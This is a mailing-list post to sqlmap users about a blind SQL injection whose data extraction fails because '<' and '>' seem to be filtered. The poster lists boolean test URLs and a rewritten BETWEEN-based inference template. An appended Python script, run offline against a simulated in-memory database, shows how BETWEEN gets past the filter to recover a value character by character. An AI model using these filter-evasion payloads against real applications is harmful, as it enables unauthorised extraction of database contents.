[sqlmap-users] blind sql injection problem
From: velky b. <vel...@gm...> - 2010-02-20 17:38:26
Hello,

I have found a blind SQL injection in the GET parameter of an audited MySQL application (sqlmap is also able to identify the injection), but it is not possible to dump any data (like --current-user or --current-db). The only option which is working is --fingerprint (gives the correct result of MySQL 5 version); all other options gave the same result as "None". Because it looked strange to me, I made some basic tests manually with the following results:

http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE)
http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE

As you can see from these results, it looks like the characters "<" and ">" are filtered within the application. However, the injection is still working. I suppose that sqlmap uses these characters ("<", ">") really often during dumping of data from the database. So I have changed the following line in the mysql section of the queries.xml file:

original line: <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
updated line: <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>

Unfortunately, the result was the same (None). What else should be modified? Is it possible to use the BETWEEN statement instead of ">" in the current version of sqlmap? Is it already supported somehow in sqlmap, or would it appear in future versions?

Thank you in advance
vb
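The inference the post describes, written out as an added example (not code from the original post or from sqlmap): a boolean oracle that simulates the hypothesised filter (any payload containing "<" or ">" is answered FALSE, everything else is appended to the vulnerable query), and a per-character binary search that uses only BETWEEN, i.e. the queries.xml template with ">" rewritten as "BETWEEN 0 AND %d", next to the default ">" search. The database, the target query, the secret value and the ORD()/MID() shims (sqlite3 stands in for MySQL so the example runs offline) are all constructed assumptions.

```python
import sqlite3

# Constructed sample value standing in for the result of --current-user.
SECRET_USER = "root@localhost"


def _ord(s):
    # MySQL semantics: ORD('') is 0, and MID() past the end of a string is ''.
    return ord(s[0]) if s else 0


def _mid(s, pos, length):
    # MySQL MID(str, pos, len) is 1-based.
    return s[pos - 1:pos - 1 + length]


def build_db():
    # In-memory sqlite3 database (assumption) with ORD/MID registered so the
    # injected payloads keep their MySQL syntax.
    conn = sqlite3.connect(":memory:")
    conn.create_function("ORD", 1, _ord)
    conn.create_function("MID", 3, _mid)
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO items VALUES (9, 'widget')")
    conn.execute("CREATE TABLE settings (k TEXT, v TEXT)")
    conn.execute("INSERT INTO settings VALUES ('current_user', ?)", (SECRET_USER,))
    return conn


CONN = build_db()

# Hypothetical subquery whose result we want to extract one character at a time.
TARGET = "SELECT v FROM settings WHERE k = 'current_user'"


def page_is_true(injection):
    """Boolean oracle modelling the behaviour observed in the post: a payload
    containing '<' or '>' is treated as FALSE (the suspected filter); any other
    payload is appended to the vulnerable query for id=9 and TRUE means a row
    came back. The query shape is an assumption."""
    if "<" in injection or ">" in injection:
        return False
    sql = f"SELECT name FROM items WHERE id = 9 {injection}"
    return CONN.execute(sql).fetchone() is not None


def char_via_between(pos):
    """Binary search ORD(MID(TARGET, pos, 1)) over 0..255 using only BETWEEN.
    'BETWEEN 0 AND mid' is the same test as '<= mid', so the search narrows
    the upper bound on TRUE and raises the lower bound on FALSE."""
    low, high = 0, 255
    while low < high:
        mid = (low + high) // 2
        if page_is_true(f"AND ORD(MID(({TARGET}), {pos}, 1)) BETWEEN 0 AND {mid}"):
            high = mid
        else:
            low = mid + 1
    return low


def char_via_gt(pos):
    """The same search with the default '>' template. Under the filter every
    answer is FALSE, so the search always converges on 0."""
    low, high = 0, 255
    while low < high:
        mid = (low + high) // 2
        if page_is_true(f"AND ORD(MID(({TARGET}), {pos}, 1)) > {mid}"):
            low = mid + 1
        else:
            high = mid
    return low


def extract(char_fn, max_len=64):
    """Recover the target string character by character; ORD() == 0 means
    MID() ran past the end of the string."""
    out = []
    for pos in range(1, max_len + 1):
        code = char_fn(pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    print("manual checks:",
          page_is_true("AND 1 = 1"), page_is_true("AND 6 > 5"),
          page_is_true("AND 6 BETWEEN 0 AND 10"))
    print("with '>'      :", repr(extract(char_via_gt)))
    print("with BETWEEN  :", repr(extract(char_via_between)))
```

Against the simulated filter, the ">" search returns 0 for the first character and so yields an empty string (the "None"-like outcome from the post), while the BETWEEN search recovers the full value. The eight requests per character are the same cost as the ">" template, since both are a binary search over the byte range.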